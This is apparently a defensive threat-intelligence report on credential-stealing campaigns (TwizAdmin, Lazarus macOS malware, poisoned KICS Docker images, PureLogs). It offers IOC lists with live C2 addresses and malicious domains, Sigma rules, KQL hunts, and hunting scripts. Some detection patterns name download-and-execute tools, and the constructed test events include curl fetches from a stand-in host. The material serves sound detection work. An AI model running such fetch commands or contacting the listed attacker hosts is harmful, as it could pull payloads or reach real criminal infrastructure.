Excerpt: Active campaigns featuring TwizAdmin infostealer, Lazarus macOS malware, and poisoned Checkmarx Docker images targeting credentials.
Threat Summary
Recent OTX pulses indicate a surge in sophisticated credential theft operations leveraging diverse attack vectors. The landscape is dominated by the TwizAdmin malware suite (DataBreachPlus), which combines clipboard hijacking for cryptocurrency theft with traditional infostealing capabilities. Simultaneously, the Lazarus Group has deployed the "Mach-O Man" malware kit, utilizing "ClickFix" social engineering to target macOS users in the fintech sector. A critical supply chain compromise involving Checkmarx KICS (TeamPCP) has introduced credential-exfiltrating malware into official Docker Hub images and VS Code extensions. Additionally, PureLogs continues to evolve using steganography to hide payloads within images, while FrostyNeighbor persists in cyberespionage against Eastern European government entities using Cobalt Strike. The collective objective across these campaigns is the mass harvesting of credentials, cryptocurrency wallet seeds, and browser session data for financial gain and espionage.
Threat Actor / Malware Profile
TwizAdmin (DataBreachPlus)
- Type: Multi-stage Malware-as-a-Service (MaaS).
- Distribution: Phishing campaigns impersonating logistics entities (e.g., FedEx).
- Behavior: Clipboard hijacking for 8+ cryptocurrency chains, BIP-39 seed phrase theft, browser credential exfiltration. Includes a ransomware module (crpx0) and a Java RAT builder.
- C2: Managed via a FastAPI-based panel requiring license keys (observed C2: 103.241.66[.]238:1337).
Mach-O Man / PyLangGhostRAT (Lazarus Group)
- Type: macOS Malware Kit.
- Distribution: ClickFix attacks via Telegram; fake meeting invitations impersonating Zoom/Teams.
- Behavior: Targets macOS binaries; steals browser data and credentials; exfiltrates via Telegram.
- Persistence: Uses social engineering to trick users into executing terminal commands manually.
KICS Supply Chain Compromise (TeamPCP)
- Type: Supply Chain Attack.
- Distribution: Poisoned Docker Hub images (checkmarx/kics tags v2.1.20, v2.1.21) and VS Code extensions.
- Behavior: The trojanized KICS binary collects and encrypts scan reports containing infrastructure-as-code credentials and exfiltrates them to attacker-controlled infrastructure.
PureLogs (Unknown)
- Type: .NET Infostealer.
- Distribution: Phishing emails with TXZ archive attachments (invoice themes).
- Behavior: Uses PawsRunner steganography loader to extract encrypted payloads from PNG files. Leverages environment variables to hide commands.
FrostyNeighbor (Belarus-linked)
- Type: Cyberespionage.
- Distribution: Spearphishing with malicious attachments.
- Behavior: Utilizes PicassoLoader and Cobalt Strike. Targets government and military sectors in Ukraine, Poland, and Lithuania.
IOC Analysis
The provided indicators span multiple infrastructure types:
- Domains: Typosquatted domains (e.g., livemicrosft.com) and payload distribution sites (e.g., fanonlyatn.xyz, everycarebd.com) are prevalent. SOC teams should immediately block these at the DNS layer.
- File Hashes (SHA256/MD5): Numerous hashes are provided for the TwizAdmin payloads, Mach-O Man binaries, and compromised KICS tools. These should be loaded into EDR alerting and blocking databases.
- IPs: C2 infrastructure IPs such as 5.101.84.202 (PureLogs) require firewall blocking.
- Operationalization: SOCs should prioritize the SHA256 hashes for the Docker images and VS Code extensions to check for internal usage. The domains should be added to blocklists for web proxies and DNS sinkholes.
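Pulse exports mix plain and defanged indicators (`103.241.66[.]238:1337`, `hxxps://…`) and occasionally ship a hash that lost a character in copy/paste; pushed straight into a DNS sink or EDR blocklist, those entries silently never match. The script below is an added example, not part of the report or of Security Arsenal's tooling: it refangs and classifies each indicator, rejects malformed ones, and runs the resulting domain list over a few constructed DNS log lines. The log format, the truncated hash and the defanged URL form are constructed for the example; the IP and domain values are the ones quoted above.

```python
import ipaddress
import re

# Constructed input: the indicators quoted in the analysis above, in the mixed plain/defanged
# forms a pulse export usually contains, plus one deliberately truncated (63-char) hash.
RAW_IOCS = [
    "103.241.66[.]238:1337",        # TwizAdmin C2, defanged, with port
    "5.101.84.202",                 # PureLogs C2
    "livemicrosft.com",             # typosquat domain
    "hxxps://fanonlyatn[.]xyz/",    # payload site in defanged-URL form (constructed)
    "everycarebd.com",
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",  # TwizAdmin SHA256
    "a" * 63,                       # constructed: a SHA256 missing one character
]

SHA256_RE = re.compile(r"^[0-9a-f]{64}$")
MD5_RE = re.compile(r"^[0-9a-f]{32}$")
DOMAIN_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$")


def refang(value):
    """Undo common defanging: [.] and (.) -> '.', [:] -> ':', leading hxxp -> http."""
    v = value.strip().lower()
    for defanged, clean in (("[.]", "."), ("(.)", "."), ("[:]", ":")):
        v = v.replace(defanged, clean)
    if v.startswith("hxxp"):
        v = "http" + v[4:]
    return v


def classify(value):
    """Return (kind, normalized) where kind is ip/domain/sha256/md5, or (None, value) if malformed."""
    v = refang(value)
    if v.startswith(("http://", "https://")):
        host = v.split("://", 1)[1].split("/", 1)[0]
        return classify(host)                     # fold a URL down to its host
    host = v.rsplit(":", 1)[0] if re.search(r":\d+$", v) else v   # strip an IPv4/domain :port
    try:
        ipaddress.ip_address(host)
        return "ip", host
    except ValueError:
        pass
    if SHA256_RE.match(v):
        return "sha256", v
    if MD5_RE.match(v):
        return "md5", v
    if DOMAIN_RE.match(host):
        return "domain", host
    return None, v                                # e.g. a truncated hash: never load it


def build_blocklists(raw):
    lists = {"ip": set(), "domain": set(), "sha256": set(), "md5": set(), "malformed": []}
    for item in raw:
        kind, v = classify(item)
        if kind is None:
            lists["malformed"].append(item)       # surface these for manual review
        else:
            lists[kind].add(v)
    return lists


# Constructed resolver log lines (format is hypothetical).
SAMPLE_DNS_LOG = [
    "2026-05-23T10:01:02Z client=10.0.0.15 query=livemicrosft.com type=A",
    "2026-05-23T10:01:05Z client=10.0.0.15 query=login.microsoft.com type=A",
    "2026-05-23T10:02:11Z client=10.0.0.22 query=cdn.fanonlyatn.xyz type=A",
]


def match_dns(lines, domains):
    """Return queried names that equal a blocked domain or sit under it as a subdomain."""
    hits = []
    for line in lines:
        m = re.search(r"query=(\S+)", line)
        if not m:
            continue
        q = m.group(1).lower()
        if any(q == d or q.endswith("." + d) for d in domains):
            hits.append(q)
    return hits


if __name__ == "__main__":
    bl = build_blocklists(RAW_IOCS)
    print("malformed, not loaded:", bl["malformed"])
    print("dns hits:", match_dns(SAMPLE_DNS_LOG, bl["domain"]))
```

The subdomain match matters in practice: payload sites are often reached through a host label (`cdn.`, `api.`) that an exact-match sinkhole entry would miss.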
Detection Engineering
```yaml
title: Suspicious PowerShell Steganography Loader - PureLogs/PawsRunner
id: 6a5f2d9c-1b8e-4c3d-9a7e-1f3e5c8b2d4a
description: Detects PowerShell scripts attempting to load data from image files, a technique used by PureLogs to hide payloads.
status: experimental
date: 2026/05/23
author: Security Arsenal
references:
    - https://www.fortinet.com/blog/threat-research/purelogs-delivery-via-pawsrunner-steganography
tags:
    - attack.defense_evasion
    - attack.t1027
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: process_creation
detection:
    selection_img:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_cli:
        CommandLine|contains:
            - 'System.Drawing'
            - 'Bitmap'
            - 'FromImage'
            - 'Save('   # context of saving the decoded payload
            - '.png'
    condition: all of selection_*
falsepositives:
    - Legitimate image processing scripts
level: high
```

```yaml
title: Potential ClickFix or Fake Meeting Delivery - Mach-O Man
id: 8d4f1e2b-3a5c-4d6e-9f8a-2b4e6c9a1d3c
description: Detects shell, scripting or download-utility child processes (PowerShell, cmd, curl, bash) spawned by browsers or collaboration apps with a suspicious command line, the host-side pattern of ClickFix lures such as the ones Lazarus uses to deliver Mach-O Man. This rule covers Windows process creation logs; macOS hosts need an equivalent rule against a macOS process_creation source.
status: experimental
date: 2026/05/23
author: Security Arsenal
references:
    - https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/
tags:
    - attack.initial_access
    - attack.t1566.001
    - attack.execution
    - attack.t1059.004
logsource:
    product: windows
    category: process_creation
detection:
    selection_parent:
        ParentImage|contains:
            - '\Teams.exe'
            - '\ms-teams.exe'   # new Teams client binary
            - '\Zoom.exe'
            - '\chrome.exe'
            - '\msedge.exe'     # Edge's binary is msedge.exe, not Edge.exe
            - '\firefox.exe'
            - '\Telegram.exe'
    selection_child:
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
            - '\curl.exe'
            - '\bash.exe'   # WSL context often used in cross-platform scripts
    selection_cli_suspicious:
        CommandLine|contains:
            - 'echo'
            - 'Invoke-Expression'
            - 'IEX'
            - 'curl http'
            - 'wget'
    condition: selection_parent and selection_child and selection_cli_suspicious
falsepositives:
    - Administrative troubleshooting via web console
level: medium
```

```yaml
title: TwizAdmin C2 Panel Access - Non-Standard Port
id: 1c2b3d4e-5f6a-7b8c-9d0e-1f2a3b4c5d6e
description: Detects outbound network connections to the port associated with TwizAdmin C2 panels (1337) from scripting and runtime processes that rarely need it.
status: experimental
date: 2026/05/23
author: Security Arsenal
references:
    - https://intel.breakglass.tech/post/twizadmin-103-241-66
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    product: windows
    category: network_connection
detection:
    selection_port:
        DestinationPort: 1337
    selection_process:
        Image|endswith:
            - '\java.exe'
            - '\python.exe'
            - '\powershell.exe'
            - '\cmd.exe'
    condition: selection_port and selection_process
falsepositives:
    - Legitimate development traffic on non-standard ports
level: medium
```
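Before a rule is deployed it is worth seeing exactly which events it fires on, including the benign ones. The following is an added example, not Security Arsenal's code and not a replacement for a Sigma backend: a small evaluator for the `endswith`/`contains` modifiers used by the two process_creation rules above (list values OR-ed, fields inside a selection AND-ed, case-insensitive, all selections AND-ed as the rules' conditions require), run over five constructed process events. The selections are transcribed from the rules (using Edge's real binary name, `msedge.exe`); the events and paths are constructed.

```python
# Minimal evaluator for the Sigma selection syntax used above. Added example, not a full Sigma engine.

def field_matches(value, modifier, patterns):
    """One field of a selection: patterns are OR-ed, comparison is case-insensitive."""
    if value is None:
        return False
    v = str(value).lower()
    pats = [str(p).lower() for p in patterns]
    if modifier == "endswith":
        return any(v.endswith(p) for p in pats)
    if modifier == "contains":
        return any(p in v for p in pats)
    if modifier == "":
        return v in pats                    # plain equality, e.g. DestinationPort: 1337
    raise ValueError(f"unsupported modifier: {modifier}")


def selection_matches(event, selection):
    """Every field inside a selection must match (AND)."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        if not isinstance(patterns, list):
            patterns = [patterns]
        if not field_matches(event.get(field), modifier, patterns):
            return False
    return True


# Selections transcribed from the two process_creation rules above.
STEG_LOADER = {
    "selection_img": {"Image|endswith": [r"\powershell.exe", r"\pwsh.exe"]},
    "selection_cli": {"CommandLine|contains": ["System.Drawing", "Bitmap", "FromImage", "Save(", ".png"]},
}
CLICKFIX = {
    "selection_parent": {"ParentImage|contains": [r"\Teams.exe", r"\ms-teams.exe", r"\Zoom.exe",
                                                  r"\chrome.exe", r"\msedge.exe", r"\firefox.exe",
                                                  r"\Telegram.exe"]},
    "selection_child": {"Image|endswith": [r"\powershell.exe", r"\cmd.exe", r"\curl.exe", r"\bash.exe"]},
    "selection_cli_suspicious": {"CommandLine|contains": ["echo", "Invoke-Expression", "IEX", "curl http", "wget"]},
}
# Both rules AND all of their selections ("all of selection_*" / "a and b and c").
RULES = {"steg_loader": STEG_LOADER, "clickfix": CLICKFIX}


def rule_matches(event, rule):
    return all(selection_matches(event, sel) for sel in rule.values())


def run_rules(events, rules=RULES):
    """Return (event_index, rule_name) for every rule that fires on every event."""
    return [(i, name) for i, ev in enumerate(events)
            for name, rule in rules.items() if rule_matches(ev, rule)]


# Constructed process_creation events, not real telemetry.
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",                                     # 0: image-loading PowerShell
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -w hidden $b = New-Object System.Drawing.Bitmap('C:\Users\u\AppData\Local\Temp\cat.png')"},
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",       # 1: browser -> cmd with echo/curl
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd /c echo "verification" & curl http://example.invalid/x'},
    {"ParentImage": r"C:\Windows\explorer.exe",                                     # 2: ordinary admin use, no hit
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -Command Get-Process"},
    {"ParentImage": r"C:\Users\u\AppData\Local\Microsoft\Teams\current\Teams.exe",  # 3: Teams -> curl http
     "Image": r"C:\Program Files\Git\mingw64\bin\curl.exe",
     "CommandLine": "curl http://example.invalid/update.sh"},
    {"ParentImage": r"C:\Windows\explorer.exe",                                     # 4: benign .png copy (false positive)
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": r"pwsh -Command Copy-Item .\logo.png .\backup"},
]

if __name__ == "__main__":
    for idx, name in run_rules(EVENTS):
        print(f"event {idx}: {name} fired")
```

Event 4 shows why the first rule lists "legitimate image processing scripts" as a false positive: the bare `.png` substring fires on any PowerShell command that names an image file, so a tuned version would require one of the `System.Drawing`/`Bitmap`/`FromImage` strings in addition to the file extension.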
The two hunts below are separate queries; a single Advanced Hunting query returns one result set, so run each on its own.

```kql
// Hunt 1: DeviceNetworkEvents for connections to pulse domains/IPs (TwizAdmin, Mach-O Man, PureLogs)
let IoC_Domains = pack_array("fanonlyatn.xyz", "livemicrosft.com", "everycarebd.com", "mickeymousegamesdealer.alexavegas.icu");
let IoC_IPs = pack_array("103.241.66.238", "5.101.84.202");
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (IoC_Domains) or RemoteIP in (IoC_IPs)
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFolderPath, RemoteUrl, RemoteIP, RemotePort
| extend ThreatIntel = "OTX Pulse Match - C2 or Payload Delivery"
```

```kql
// Hunt 2: DeviceFileEvents for known-bad SHA256 values (same list as the PowerShell hunt script)
let IoC_Hashes = pack_array(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",  // TwizAdmin
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",  // TwizAdmin
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90",  // Mach-O Man
    "222e6bfed0f3bb1937bf5e719a2342871ccd683ff1c0cb967c8e31ea58beaf7b",  // KICS supply chain
    "0fcb86ae38e9975933314ac2a231f0ff46c0208556bf4a16f096a642d3f505e"    // PureLogs
);
DeviceFileEvents
| where Timestamp > ago(30d)
| where SHA256 in (IoC_Hashes)
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessAccountName
| extend ThreatIntel = "OTX Pulse Match - Malware Hash"
```
```powershell
<#
.SYNOPSIS
    IOC Hunt Script for OTX Pulse Indicators (May 2026).
.DESCRIPTION
    Scans the file system for specific SHA256 hashes associated with TwizAdmin, Mach-O Man, KICS Compromise, and PureLogs,
    then lists established TCP connections to the TwizAdmin panel port (1337).
#>
$TargetHashes = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092", # TwizAdmin
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4", # TwizAdmin
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90", # Mach-O Man
    "222e6bfed0f3bb1937bf5e719a2342871ccd683ff1c0cb967c8e31ea58beaf7b", # KICS Supply Chain
    "0fcb86ae38e9975933314ac2a231f0ff46c0208556bf4a16f096a642d3f505e"   # PureLogs
)

Write-Host "[+] Initiating Hunt for OTX Pulse IOCs..." -ForegroundColor Cyan

# Check common download and AppData directories
$PathsToScan = @(
    "$env:USERPROFILE\Downloads",
    "$env:APPDATA",
    "$env:LOCALAPPDATA",
    "C:\ProgramData",
    "C:\Temp",
    "C:\Windows\Temp"
)

$Found = $false
foreach ($Path in $PathsToScan) {
    if (Test-Path $Path) {
        Write-Host "[!] Scanning $Path..." -ForegroundColor Yellow
        # -File skips directories so Get-FileHash only runs on regular files
        Get-ChildItem -Path $Path -File -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $File = $_
            # Only hash files smaller than 100MB for performance
            if ($File.Length -lt 100MB) {
                $Hash = (Get-FileHash -Path $File.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
                # -contains is case-insensitive, so the lower-case list matches Get-FileHash's upper-case output
                if ($Hash -and ($TargetHashes -contains $Hash)) {
                    Write-Host "[!!!] MALICIOUS FILE FOUND: $($File.FullName)" -ForegroundColor Red
                    Write-Host "      Hash: $Hash" -ForegroundColor Red
                    $Found = $true
                }
            }
        }
    }
}
if (-not $Found) {
    Write-Host "[+] No known malicious hashes found on local system." -ForegroundColor Green
}

# Check for suspicious network connections (approximation: port only, the C2 IP may change)
Write-Host "[+] Checking for established connections to suspicious C2 ports (1337)..." -ForegroundColor Cyan
Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue | Where-Object { $_.RemotePort -eq 1337 } | ForEach-Object {
    $Process = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
    Write-Host "[!!!] Suspicious Connection on Port 1337: $($_.RemoteAddress) | LocalPort $($_.LocalPort) | Process: $($Process.ProcessName) (PID: $($_.OwningProcess))" -ForegroundColor Red
}
```
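The hunt script above only runs on Windows, while Mach-O Man targets macOS and the poisoned KICS images run on Linux build hosts. The following is an added example, not Security Arsenal's script: the same hash hunt in portable Python, with streamed hashing, the same 100 MB size cap, no symlink following, and unreadable files skipped rather than aborting the scan. The hash list is copied from the script above; the per-platform root directories are this example's own choice, and `demo_in_tempdir` is a constructed self-check that plants a benign file and confirms the hunt finds it.

```python
import hashlib
import os
import stat
import sys
import tempfile
from pathlib import Path

# SHA256 indicators from the hunt script above (lower-case; hexdigest() output is lower-case too).
TARGET_HASHES = {
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",  # TwizAdmin
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",  # TwizAdmin
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90",  # Mach-O Man
    "222e6bfed0f3bb1937bf5e719a2342871ccd683ff1c0cb967c8e31ea58beaf7b",  # KICS supply chain
    "0fcb86ae38e9975933314ac2a231f0ff46c0208556bf4a16f096a642d3f505e",   # PureLogs
}
MAX_SIZE = 100 * 1024 * 1024   # same 100 MB cap as the PowerShell hunt


def sha256_of(path, chunk=1 << 20):
    """Stream the file through SHA-256 so large files are never read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def hunt(roots, targets=TARGET_HASHES, max_size=MAX_SIZE):
    """Walk each root and return [(path, sha256)] for regular files whose hash is in targets."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root, followlinks=False):
            for name in files:
                p = Path(dirpath) / name
                try:
                    st = p.lstat()                        # lstat: do not resolve symlinks
                    if not stat.S_ISREG(st.st_mode) or st.st_size > max_size:
                        continue
                    digest = sha256_of(p)
                except OSError:
                    continue                              # permission denied, vanished file, etc.
                if digest in targets:
                    hits.append((str(p), digest))
    return hits


def default_roots():
    """Example root set per platform (this example's choice, not an authoritative list)."""
    home = Path.home()
    if sys.platform == "darwin":
        return [home / "Downloads", home / "Library" / "LaunchAgents",
                home / "Library" / "Application Support", Path("/tmp"), Path("/private/var/tmp")]
    if os.name == "nt":
        env_dirs = [Path(p) for p in (os.environ.get("APPDATA"), os.environ.get("LOCALAPPDATA")) if p]
        return env_dirs + [home / "Downloads", Path(r"C:\ProgramData"), Path(r"C:\Temp"), Path(r"C:\Windows\Temp")]
    return [home / "Downloads", home / ".config", Path("/tmp"), Path("/var/tmp")]


def demo_in_tempdir():
    """Constructed self-check: plant a benign file, add its hash to the target set, expect exactly one hit."""
    with tempfile.TemporaryDirectory() as d:
        planted = Path(d) / "sample.bin"
        planted.write_bytes(b"constructed sample, not malware\n")
        (Path(d) / "other.txt").write_text("unrelated\n")
        want = sha256_of(planted)
        hits = hunt([d], targets={want} | TARGET_HASHES)
        return hits == [(str(planted), want)]


if __name__ == "__main__":
    roots = [str(r) for r in default_roots() if r.is_dir()]
    found = hunt(roots)
    for path, digest in found:
        print(f"[!!!] MALICIOUS FILE FOUND: {path}  sha256={digest}")
    if not found:
        print("[+] No known malicious hashes found under", roots)
```

Run it with `python3 hunt.py` on the macOS or Linux host in question; the hit list is returned rather than only printed so it can be shipped to a case-management tool.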
Response Priorities
- Immediate:
  - Block all listed domains and IPs at the firewall and proxy level.
  - Scan all endpoints for the provided SHA256 file hashes.
  - Identify and quarantine any systems running the compromised checkmarx/kics Docker images (tags v2.1.20, v2.1.21, alpine) or VS Code extensions (v1.17.0, v1.19.0). Update to clean versions immediately.
- 24 Hours:
  - Force a password reset for all users who may have interacted with FedEx-related lures or fake meeting invites (Zoom/Teams).
  - Revoke SSH keys and API tokens stored in infrastructure-as-code repositories scanned by the compromised KICS tool.
  - Investigate any PowerShell logs containing steganography-related keywords (System.Drawing, Bitmap).
- 1 Week:
  - Review and harden supply chain security; implement image signing verification for Docker images.
  - Conduct user awareness training specifically regarding "ClickFix" social engineering and fake collaboration platform invites.
  - Audit macOS endpoints for signs of "Mach-O Man" infection (unusual terminal commands, fake Zoom installers).